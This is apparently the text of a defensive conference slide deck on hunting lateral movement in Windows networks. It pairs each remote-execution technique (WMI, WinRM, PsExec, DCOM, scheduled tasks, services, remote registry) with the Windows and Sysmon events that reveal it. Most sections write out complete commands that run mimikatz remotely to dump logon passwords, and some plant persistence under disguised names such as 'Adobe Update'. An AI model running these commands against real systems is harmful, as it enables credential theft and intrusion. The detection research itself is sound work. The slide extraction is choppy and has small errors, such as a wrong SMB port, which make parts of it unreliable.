Hunting Lateral Movement in Windows Infrastructure

Hunting Lateral Movement in Windows Infrastructure

Teymur Kheirkhabarov

Who Am I

• Senior SOC Analyst @Kaspersky Lab• SibSAU (Krasnoyarsk) graduate• Ex- Infosec dept. head• Ex- Infosec admin• Ex- System admin • Twitter @HeirhabarovT• www.linkedin.com/in/teymur-kheirkhabarov-73490867/

What we’re going to talk about

• Different ways to launch executables remotely by usingcompromised credentials and operating systemfunctionality;

• How to detect remotely launched executables withWindows Event and Sysmon logs.

Remote file copy over SMB

• Copy to autostart locations for execution on login or boot

• Copy to different locations for further execution via WMI, WinRM, Powershell Remoting, Task Scheduler, Service…

• Programmatically

• Using Explorer

• Using standard console tools:• robocopy C:\tools \\pc0002\ADMIN$\users\public mimikatz.exe

• powershell Copy-Item -Path mimikatz.exe -Destination \\pc0002\C$\users\public

• cmd /c "copy mimikatz.exe \\pc0002\C$\users\public"

• xcopy mimikatz.exe \\pc0002\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

How

• TCP/455 port is accessible on remote host

• Administrative shares are enabled on remote host

Requirements & limitations

Remote File Copy over SMB – events sequence on destination side

E2. Special privileges assigned to new

logon (Windows EID 4672)

E1. Network Logon (Windows EID 4624)

E3. Administrative share access

(Windows EID 5140/5145)

E4. File object access with WriteData or

AddFile rights (Windows EID 4663) – if audit and SACL were configured

Remote File Copy over SMB – the most interesting events

Hunting: search for administrative shares connections

Windows File Auditing

https://www.malwarearchaeology.com/s/Windows-File-Auditing-Cheat-Sheet-ver-Oct-2016.pdf

https://www.malwarearchaeology.com/s/Windows-File-Auditing-Cheat-Sheet-ver-Oct-2016.pdf

Hunting: search for file creation/changes in autostart locations

Remote execution via WMI


• Using standard tools:• wmic /node:pc0002 process call create "cmd /c C:\Users\Public\mimikatz.exe

privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"

• powershell Invoke-WmiMethod -ComputerName pc0002 -Class Win32_Process -Name Create -ArgumentList '"cmd /c C:\Users\Public\mimikatz.exeprivilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"'

• powershell -command "&{$process = [WMICLASS]'\\pc0002\ROOT\CIMV2:win32_process'; $process.Create('calc.exe'); }"

• powershell -command "&{$process = get-wmiobject -query 'SELECT * FROM Meta_Class WHERE __Class = \"Win32_Process\"' -namespace 'root\cimv2' -computername pc0002; $process.Create( 'notepad.exe' );}"

How


• RPC dynamic port range is accessible on remote host


Remote execution via WMI – events sequence on destination side




E3. WmiPrvSE.exestarts payload file

(Sysmon EID 1)

Remote execution via WMI – the most interesting events

Remote execution via WinRM


• Using Windows Remote Shell (WinRS) tool:• winrs -r:pc0002.test.local C:\Users\Public\mimikatz.exe privilege::debug

sekurlsa::logonpasswords exit

• winrs -r:pc0002.test.local -u:dadmin C:\Users\Public\mimikatz.exeprivilege::debug sekurlsa::logonpasswords exit

How

• WinRM is enabled on remote host (disabled by default on client Windows versions)

• TCP/5985 (TCP/5986) port is accessible on remote host


Remote execution via WinRM – events sequence on destination side




E3. svchost.exestarts WinrsHost.exe

(Sysmon EID 1)

E4. WinrsHost.exestarts payload file

(Sysmon EID 1)

Remote execution via WinRM – the most interesting events

Remote execution via Powershell Remoting

• Powershell scripts

• Powershell Invoke-Command cmdlet:• powershell Invoke-Command -ComputerName pc0002.test.local -ScriptBlock

{cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\pc0002_mimikatz_output.txt }

• powershell Invoke-Command -ComputerName pc0002.test.local -credential TEST\dadmin -ScriptBlock {cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\pc0002_mimikatz_output.txt }

How

• WinRM is enabled on remote host (disabled by default on client Windows versions)

• TCP/5985 (TCP/5986) port is accessible on remote host


Remote execution via Powershell Remoting– events sequence on destination side




E3. svchost.exestarts

wsmprovhost.exe(Sysmon EID 1)

E4. wsmprovhost.exestarts payload file

(Sysmon EID 1)

Remote execution via Powershell Remoting– the most interesting events

Remote execution via MMC20.Application COM

How

• Programmatically• Using powershell:

powershell -command "&{$com=[activator]::CreateInstance([type]::GetTypeFromProgID('MMC20.Application','pc0002.test.local')); $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,'/c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\pc0002_mimikatz_output.txt','7')}"


• TCP/135 port is accessible on remote host• RPC dynamic port range is accessible on remote host

https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/




E3. svchost.exestarts mmc.exe(Sysmon EID 1)

E4. mmc.exe starts payload file (Sysmon

EID 1)

Remote execution via MMC20.Application COM – events sequence on destination side

Remote execution via MMC20.Application COM – the most interesting events

Remote execution via PsExec (& clones, e.g. PaExec)

• PsExex:• psexec.exe \\pc0002 -c mimikatz.exe privilege::debug


• PaExec:• paexec.exe \\pc0002 -c mimikatz.exe privilege::debug


How

• ADMIN$ administrative share is enabled on remote host






E3. Copying PSEXESVC.exe to

ADMIN$ (Windows EID 5140/5145)

E4. psexesvc service is installed and

started (Windows EID 7045/7036)

Remote execution via PsExec (& clones) –events sequence on destination side

E5. psexesvc.exe is started by

services.exe(Sysmon EID 1)

E6. psexesvc.exestarts payload file

(Sysmon EID 1)

E7. Interaction with payload

stdin/stdout/stderrvia SMB pipes

(Windows EID 5145)

Remote execution via PsExec (& clones) –the most interesting events

Hunting: search for PsExec (& clones) artifacts – services

Hunting: search for PsExec (& clones) artifacts – access to pipes

Remote execution via PsExec (& clones) –the most interesting events

Hunting: search for executions in network logon sessions (WinRM, WMI, PsExec, Powershell Remoting, MMC20 COM)

Remote execution via ShellWindows COM

How


powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39','pc0002')); $obj.item().Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:\Windows\System32',$null,0)}"


• TCP/135 port is accessible on remote host• RPC dynamic port range is accessible on remote host

https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/


Remote execution via ShellBrowserWindow COM

How


powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880','pc0002')); $obj.Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:\Windows\System32',$null,0)}"


• TCP/135 port is accessible on remote host• RPC dynamic port range is accessible on remote host• Doesn’t work for Windows 7 destination






Remote execution via ShellWindows or ShellBrowserWindow COM – events sequenceon destination side

E3. explorer.exestarts payload file in

current session (Sysmon EID 1)

Remote execution via via ShellWindowsor ShellBrowserWindow COM – how to detect???

Payload file is executed in the session of the current active user

Remote execution via Scheduled Tasks


• Standard command line tools:• at \\172.16.205.14 3:55 C:\Users\Public\mimikatz.exe privilege::debug

sekurlsa::logonpasswords exit >> win_mimikatz_output.txt

• schtasks /create /S pc0002 /SC ONCE /ST 00:57:00 /TN "Adobe Update" /TR "cmd.exe /c C:\users\public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"

How

• TCP/135 port and RPC dynamic port range are accessible on remote host (in case of Schtasks usage)

• TCP/445 port is accessible on remote host (in case of AT usage)


Remote execution via Scheduled Tasks –events sequence on destination side




E3. Access to atsvcSMB Pipe (Windows EID 5145) – in case

of at.exe usage

E6. taskeng.exestarts payload file

(Sysmon EID 1)

E4. Scheduled task is created or updated

(Windows EID 4698/4702)

E5. Task is triggered. svchost.exe starts

taskeng.exe (SysmonEID 1)

Also there are some interesting event in Microsoft-Windows-TaskScheduler/Operational event log

Remote execution via Scheduled Tasks –the most interesting events

Hunting: search for remotely created or updated scheduler tasks

Remote execution via Scheduled Tasks –the most interesting events

Hunting: search for ATSVC pipe connections

Remote execution via Services


• Standard command line tool:• sc \\pc0002 create "Remote service" binPath= "cmd /c

C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt\"

sc \\pc0002 start "Remote service"

sc \\pc0002 delete »Remote service"

How


• RPC dynamic port range is accessible on remote host


Remote execution via Services – events sequence on destination side




E3. New service is installed (Windows

EID 7045/4697)

E4. Start command is sent to installed

service. services.exestarts payload file

(Sysmon EID 1)

E5. A timeout is reached (Windows

EID 7009)

E6. Failure while trying to start

service (Windows EID 7000)

Remote execution via Services – the most interesting events

Hunting: search for remotely created services

Remote registry

How

• Programmatically• Using powershell or reg:

• reg add \\pc0002\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v GoogleUpdater /t REG_SZ /d "cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"

• powershell -command "&{$reg=[Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey(\"LocalMachine\", \"pc0002\"); $key=$reg.OpenSubKey(\"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\",$True); $key.SetValue(\"GoogleUpdater\",\"calc.exe\");}"


• TCP/445 port is accessible on remote host• Remote Registry service is enabled on remote host

Remote registry – events sequence on destination side




E3. WINREG pipe access (Windows EID

5145)

E4. Registry value is modified (Windows EID

4657) – if audit and SACL were configured

Remote Registry – the most interesting events

Hunting: search for WINREG pipe connections

Windows Registry Auditing

https://www.malwarearchaeology.com/s/Windows-Registry-Auditing-Cheat-Sheet-ver-Oct-2016.pdf

https://www.malwarearchaeology.com/s/Windows-Registry-Auditing-Cheat-Sheet-ver-Oct-2016.pdf

Hunting: search for changes in autostartregistry keys

Remote WMI subscriptions creation

Remote WMI subscriptions creation –events sequence on destination side




E3. Writing to WMI Namespace (Windows EID 4662) – if audit and SACL were configured

WMI Namespaces Auditing

Remote WMI subscriptions creation – the most interesting events

Hunting Lateral Movement in Windows Infrastructure

Technology